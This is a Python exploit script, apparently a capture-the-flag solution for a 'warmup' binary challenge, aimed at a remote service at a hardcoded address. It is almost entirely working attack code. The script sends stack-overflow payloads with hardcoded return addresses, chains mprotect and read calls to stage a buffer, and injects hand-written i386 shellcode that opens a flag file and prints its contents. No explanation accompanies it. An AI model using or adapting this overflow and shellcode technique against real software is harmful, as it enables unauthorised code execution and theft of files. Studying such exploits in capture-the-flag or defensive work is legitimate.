from codez import *
import socket
import time
#from struct import *

#r = Remote('localhost',1234)
r  =Remote('202.120.7.207',52608)
#flag_p = '/home/warmup/flag\x00'.ljust(119,'\x00')
flag_p = '/tmp//warmup/flag\x00'.ljust(119,'\x00')

hellcode= ('''
   	mov ebx,0x8048000
	mov ecx,0x1000
	mov edx,7
	mov eax,125
	int 80h
	jmp fap
x:	
	pop esi
	mov edi,0x8048000
	mov ecx,20
	rep movsb
	mov ebx,0x8048000
	mov ecx,0x1000
	mov edx,2
	mov eax,125
	int 80h
	mov ebx,0x8048000
	mov eax,5
	int 80h
	mov ecx,0
	mov ebx,eax
	sub esp,0x100
	mov ecx,esp
	mov edx,128
	mov eax,3
	int 80h
    mov word [esp+120],0x2323
	mov ecx,esp
	mov edx,128
	mov ebx,1
	mov eax,4
	int 80h
     
fap:
call  x
db '/home/sandbox/flag',0
''')

shellcode= asm(hellcode,'i386')
shellcode = shellcode.ljust(0x1000,"\xcc")
buf = 0x08049000


r.read('!')
p0 = 'A'*(0x34-20)
p0 += pack('I',0x0804811D)

p0 += pack('IIII',0x804815d,0,buf,len(flag_p))
r.write(p0)
r.read('!')
r.write(flag_p)

for i in range(4):
    p0 = 'A'*(0x34-20)
    p0 += pack('I',0x80480d8)
    p0 += pack('IIII',0x1000,7,2,3)
    r.write(p0)
    r.read('!')
    r.read('!')

    p0 = 'A'*(0x34-20)
    p0 += pack('I',0x80480d8)#0x0804811D)
    p0 += pack('IIII',4,0x8048122,0x804815A,buf)
    r.write(p0)
    r.read('!')
    r.read('!')


p1 = 'A'*(0x34-20)
p1 += pack('I',0x0804811D)
#p1 += pack('IIII',0x8048112,1,buf,5)
p1 += pack('IIII',0x80481B8,0,buf,125)

r.write(p1)
r.read('!')
r.write('a'*125)

p1 = 'A'*(0x34-20)
p1 += pack('I',0x0804811D)
#p1 += pack('IIII',0x8048112,1,buf,5)
p1 += pack('IIII',buf,0,buf,0x1000)

r.write(p1)
r.read('!')
r.write(shellcode)
print r.read('#')